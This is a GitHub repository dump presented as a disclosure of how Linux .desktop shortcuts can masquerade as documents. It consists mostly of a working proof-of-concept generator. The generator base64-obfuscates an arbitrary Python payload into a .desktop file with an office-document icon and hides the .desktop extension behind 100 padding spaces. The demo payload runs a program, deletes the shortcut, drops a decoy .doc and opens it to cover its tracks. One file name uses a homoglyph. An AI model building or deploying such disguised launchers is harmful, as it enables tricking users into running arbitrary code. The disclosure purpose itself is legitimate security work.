├── decoy.doc ├── sketchy.doc.ziр ├── desktop.tmpl ├── payload.py ├── README.md ├── desktop-file-generator.py └── sketchy.doc.desktop /decoy.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DonnchaC/desktop-file-social-engineering/HEAD/decoy.doc -------------------------------------------------------------------------------- /sketchy.doc.ziр: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DonnchaC/desktop-file-social-engineering/HEAD/sketchy.doc.ziр -------------------------------------------------------------------------------- /desktop.tmpl: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Version=1.0 3 | Name={{ filename }} 4 | Exec=python -c "{{ python_payload }}" 5 | Icon=x-office-document 6 | Terminal=false 7 | Type=Application 8 | {# The resource file must be the last entry in the Desktop file to be correctly parsed #} 9 | Resource={{ decoy_data }} 10 | -------------------------------------------------------------------------------- /payload.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import base64 3 | import re 4 | import os 5 | 6 | # Run the payload 7 | subprocess.Popen(["gnome-calculator"]) 8 | 9 | # Find the desktop file and replace it with the decoy 10 | desktop_filename = os.environ["GIO_LAUNCHED_DESKTOP_FILE"] 11 | current_dir = os.path.dirname(desktop_filename) 12 | 13 | with open(desktop_filename, "r") as desktop_file: 14 | desktop_data = desktop_file.read() 15 | 16 | # Extract the file name and decoy file data from the .desktop file 17 | display_name = re.search(r"^Name=(.*)$", desktop_data, re.MULTILINE).group(1) 18 | decoy_data_b64 = re.search(r"^Resource=([\s\S]*)$", desktop_data, re.MULTILINE).group(1) 19 | decoy_data = base64.b64decode(decoy_data_b64) 20 | 21 | # Save the decoy file 
with the same name as the Desktop name 22 | final_filename = os.path.join(current_dir, display_name) 23 | with open(final_filename, "w") as decoy_file: 24 | decoy_file.write(decoy_data) 25 | 26 | # Remove the original .desktop file 27 | os.remove(desktop_filename) 28 | 29 | # Do something with the decoy file 30 | subprocess.Popen(["libreoffice", final_filename]) 31 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Security Risks of .desktop Shortcuts 2 | ==================================== 3 | 4 | After reading a [Reddit post](https://www.reddit.com/r/linux/comments/5r6va0/how_to_easily_trick_file_manager_users_to_execute/) by "wander_homer", I was reminded to look at how .desktop shortcut files are handled on modern Linux systems. 5 | 6 | A .desktop file which has the executable bit set will be parsed specially by file managers such as Nautilus. Rather than showing the true filename and file type, Nautilus will display the application name and icon which are specified in the .desktop file. This allows for a malicious .desktop shortcut to easily masquerade as a safe file type. 7 | 8 | Nautilus 3.22 added support for the automatic extraction of zip files and other archives when opened. This greatly increases the risk of this type of social engineering attack as a regular user will now have no opportunity to view the real file type before executing the command in the .desktop file. 9 | 10 | These risks are not new; they have been [discussed for more than 10 years](https://lwn.net/Articles/178409/). However, serious thought needs to be given to mitigating these risks if Linux is to scale safely to more users. 11 | 12 | ### Example .desktop files 13 | 14 | This repository contains a script for generating a malicious .desktop file which stealthily executes a Python payload.
The payload cleans up the desktop shortcut and replaces it with a legitimate decoy file. 15 | 16 | [sketchy.doc.zip](https://github.com/DonnchaC/desktop-file-social-engineering/raw/master/sketchy.doc.ziр) 17 | -------------------------------------------------------------------------------- /desktop-file-generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import argparse 5 | import base64 6 | import zipfile 7 | 8 | from jinja2 import Template 9 | 10 | 11 | if __name__ == "__main__": 12 | parser = argparse.ArgumentParser(description="Create an executable .desktop file for RCE.") 13 | parser.add_argument("-c", "--desktop-template", metavar="DESKTOP_TEMPLATE", 14 | help="Template containing the desktop file (default '%(default)s').", 15 | default="desktop.tmpl", type=argparse.FileType('r')) 16 | 17 | parser.add_argument("-p", "--payload", metavar="PAYLOAD", type=argparse.FileType('r'), 18 | help="Python code for the payload (default '%(default)s').", 19 | default="payload.py") 20 | 21 | parser.add_argument("-d", "--decoy", metavar="DECOY", type=argparse.FileType('rb'), 22 | help="Decoy file to replace the .desktop file (default '%(default)s').", 23 | default="decoy.doc") 24 | 25 | parser.add_argument("-n", "--payload-name", metavar="PAYLOAD_FILENAME", type=str, 26 | help="The name of the generated desktop file (default: '%(default)s')", 27 | default="sketchy.doc") 28 | 29 | args = parser.parse_args() 30 | 31 | print("Creating malicious .desktop file\n---------") 32 | decoy_base64 = base64.b64encode(args.decoy.read()) 33 | payload_base64 = base64.b64encode(args.payload.read()) 34 | python_payload = "import base64; exec(base64.b64decode('{}'))".format(payload_base64) 35 | 36 | # Format the payload and create the .desktop file from the template.
37 | desktop_template = Template(args.desktop_template.read()) 38 | desktop_file_content = desktop_template.render(python_payload=python_payload, 39 | filename=args.payload_name, 40 | decoy_data=decoy_base64) 41 | 42 | # Add spaces to filename to extension in archive 43 | desktop_file = args.payload_name + (" " * 100) + ".desktop" 44 | with open(desktop_file, "w") as payload: 45 | payload.write(desktop_file_content) 46 | os.chmod(desktop_file, 0o755) 47 | print("Wrote .desktop file to {}".format(desktop_file)) 48 | 49 | zip_filename = "sketchy.zip" 50 | zipf = zipfile.ZipFile(zip_filename, "w", zipfile.ZIP_DEFLATED) 51 | zipf.write(desktop_file) 52 | zipf.close() 53 | print("Wrote zip file containing desktop file to {}".format(zip_filename)) 54 | -------------------------------------------------------------------------------- /sketchy.doc.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Version=1.0 3 | Name=sketchy.doc 4 | Exec=python -c "import base64; 
exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IGJhc2U2NAppbXBvcnQgcmUKaW1wb3J0IG9zCgojIFJ1biB0aGUgcGF5bG9hZApzdWJwcm9jZXNzLlBvcGVuKFsiZ25vbWUtY2FsY3VsYXRvciJdKQoKIyBGaW5kIHRoZSBkZXNrdG9wIGZpbGUgYW5kIHJlcGxhY2UgaXQgd2l0aCB0aGUgZGVjb3kKZGVza3RvcF9maWxlbmFtZSA9IG9zLmVudmlyb25bIkdJT19MQVVOQ0hFRF9ERVNLVE9QX0ZJTEUiXQpjdXJyZW50X2RpciA9IG9zLnBhdGguZGlybmFtZShkZXNrdG9wX2ZpbGVuYW1lKQoKd2l0aCBvcGVuKGRlc2t0b3BfZmlsZW5hbWUsICJyIikgYXMgZGVza3RvcF9maWxlOgogICAgZGVza3RvcF9kYXRhID0gZGVza3RvcF9maWxlLnJlYWQoKQoKIyBFeHRyYWN0IHRoZSBmaWxlIG5hbWUgYW5kIGRlY295IGZpbGUgZGF0YSBmcm9tIHRoZSAuZGVza3RvcCBmaWxlCmRpc3BsYXlfbmFtZSA9IHJlLnNlYXJjaChyIl5OYW1lPSguKikkIiwgZGVza3RvcF9kYXRhLCByZS5NVUxUSUxJTkUpLmdyb3VwKDEpCmRlY295X2RhdGFfYjY0ID0gcmUuc2VhcmNoKHIiXlJlc291cmNlPShbXHNcU10qKSQiLCBkZXNrdG9wX2RhdGEsIHJlLk1VTFRJTElORSkuZ3JvdXAoMSkKZGVjb3lfZGF0YSA9IGJhc2U2NC5iNjRkZWNvZGUoZGVjb3lfZGF0YV9iNjQpCgojIFNhdmUgdGhlIGRlY295IGZpbGUgd2l0aCB0aGUgc2FtZSBuYW1lIGFzIHRoZSBEZXNrdG9wIG5hbWUKZmluYWxfZmlsZW5hbWUgPSBvcy5wYXRoLmpvaW4oY3VycmVudF9kaXIsIGRpc3BsYXlfbmFtZSkKd2l0aCBvcGVuKGZpbmFsX2ZpbGVuYW1lLCAidyIpIGFzIGRlY295X2ZpbGU6CiAgICBkZWNveV9maWxlLndyaXRlKGRlY295X2RhdGEpCgojIFJlbW92ZSB0aGUgb3JpZ2luYWwgLmRlc2t0b3AgZmlsZQpvcy5yZW1vdmUoZGVza3RvcF9maWxlbmFtZSkKCiMgRG8gc29tZXRoaW5nIHdpdGggdGhlIGRlY295IGZpbGUKc3VicHJvY2Vzcy5Qb3BlbihbImxpYnJlb2ZmaWNlIiwgZmluYWxfZmlsZW5hbWVdKQo='))" 5 | Icon=x-office-document 6 | Terminal=false 7 | Type=Application 8 | 9 | 
Resource=0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAOwADAP7/CQAGAAAAAAAAAAAAAAABAAAADwAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9//////////7///8EAAAABQAAAAYAAAAHAAAACAAAAAkAAAAKAAAACwAAAAwAAAANAAAADgAAAP7///8QAAAA/v///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////1IAbwBvAHQAIABFAG4AdAByAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAUA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD+////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP7///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAAAQAAAP7////+////BAAAAAUAAAAGAAAABwAAAAgAAAAJAAAACgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0AAAD+////HwAAACAAAAAhAAAAIgAAAP7///8kAAAAJQAAACYAAAAnAAAAKAAAACkAAAAqAAAAKwAAACwAAAAtAAAALgAAAC8AAAAwAAAAMQAAADIAAAAzAAAANAAAADUAAAA2AAAANwAAADgAAAA5AAAAOgAAADsAAAA8AAAAPQAAAD4AAAA/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAARgAAAEcAAABIAAAASQAAAEoAAABLAAAATAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMAAABUAAAAVQAAAFYAAABXAAAAWAAAAFkAAABaAAAAWwAAAP7///9dAAAA/v////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8BAP7/AwoAAP////8GCQIAAAAAAMAAAAAAAABGGAAAAE1pY3Jvc29mdCBXb3JkLURva3VtZW50AAoAAABNU1dvcmREb2MAEAAAAFdvcmQuRG9jdW1lbnQuOAD0ObJxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASABQACgABAFsADwACAAAAAAAAAF4AABDx/wIAXgAAAAYATgBvAHIAbQBhAGwAAAALAAAAMSQBKiQBQSQAADMAQioAT0oDAFFKAwBDShgAbUgJBHNICQRLSAEAUEoEAG5IBAh0SAQIXkoFAGFKGABfSDkEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGAP4fAQACAUYAAAAHAEgAZQBhAGQAaQBuAGcAAAANAA8AE6TwABSkeAAGJAEAGABPSgYAUUoGAENKHABQSgQAXkoFAGFKHAA0AEIQAQACATQAAAAJAFQAZQB4AHQAIABCAG8AZAB5AAAAEAAQABJkIAEBABOkAAAUpIwAAAAgAC8QAQESASAAAAAEAEwAaQBzAHQAAAACABEABABeSgcAQAAiEAEAIgFAAAAABwBDAGEAcAB0AGkAbwBuAAAADQASABOkeAAUpHgADCQBABIAQ0oYADYIAV5KBwBhShgAXQgBJgD+HwEAMgEmAAAABQBJAG4AZABlAHgAAAAFABMADCQBAAQAXkoHAAAAAAAGAAAABAAADgAAAAD/////AAgAAAwIAAAFAAAAAAgAAAwIAAAGAAAAAAAAAAYAAAAAAAAAAhAAAAAAAAAABgAAAFAAAAgAAAAACAAAAEcWkAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABUAGkAbQBlAHMAIABOAGUAdwAgAFIAbwBtAGEAbgAAADUWkAECAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTAHkAbQBiAG8AbAAAADMmkAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAHIAaQBhAGwAAABpFpABAREAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATABpAGIAZQByAGEAdABpAG8AbgAgAFMAZQByAGkAZgAAAFQAaQBtAGUAcwA
gAE4AZQB3ACAAUgBvAG0AYQBuAAAATwaQAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAcgBvAGkAZAAgAFMAYQBuAHMAIABGAGEAbABsAGIAYQBjAGsAAAA5BpABAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARgByAGUAZQBTAGEAbgBzAAAAUyaQAQEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEwAaQBiAGUAcgBhAHQAaQBvAG4AIABTAGEAbgBzAAAAQQByAGkAYQBsAAAAOSSQAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYAcgBlAGUAUwBhAG4AcwAAAEIABAABCI0YAADFAgAAaAEAAAAAY81RZ8PNUWcAAAAAAQAAAAAAAQAAAAUAAAABAAEAAAAEAIOQAQAAAAEAAAAFAAAAAQABAAAAAQAAAAAAAAAnAwAgAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAIAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD+/wAAAQACAAAAAAAAAAAAAAAAAAAAAAABAAAA4IWf8vlPaBCrkQgAKyez2TAAAAAIAQAADQAAAAEAAABwAAAAAgAAAHgAAAADAAAAhAAAAAQAAACQAAAABQAAAJwAAAAGAAAAqAAAAAcAAAC0AAAACAAAAMAAAAAJAAAAzAAAAAoAAADYAAAACwAAAOQAAAAMAAAA8AAAAA0AAAD8AAAAAgAAAOn9AAAeAAAAAQAAAAAAAAAeAAAAAQAAAAAAAAAeAAAAAQAAAAAAAAAeAAAAAQAAAAAAAAAeAAAAAQAAAAAAAAAeAAAAAQAAAAAAAAAeAAAAAQAAAAAAAAAeAAAAAgAAADIAAABAAAAAAKAlJgAAAABAAAAAAAAAAAAAAABAAAAAaUaZ6FJ30gFAAAAA6HBtP1930gEAAAAAAAAAAOylAQFNIAkEAADwEr8AAAAAAAAwAAAAAAAIAAAMCAAADgBDYW9sYW44MAAAAAAAAAAAAAAAAAAAAAAAAAkEFgAyDgAAAAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//DwAFAAAAAQAAAP//DwAGAAAAAQAAAP//DwAAAAAAAAAAAAAAAAAAAAAAiAAAAAAAmgEAAAAAAACaAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACaAQA
AFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACuAQAADAAAALoBAAAMAAAAAAAAAAAAAADnAQAAOAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADGAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8EAABiAgAAAAAAAAAAAADSAQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADGAQAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACANkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAB3AG4AZQBkAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACggAAAwIAAD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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
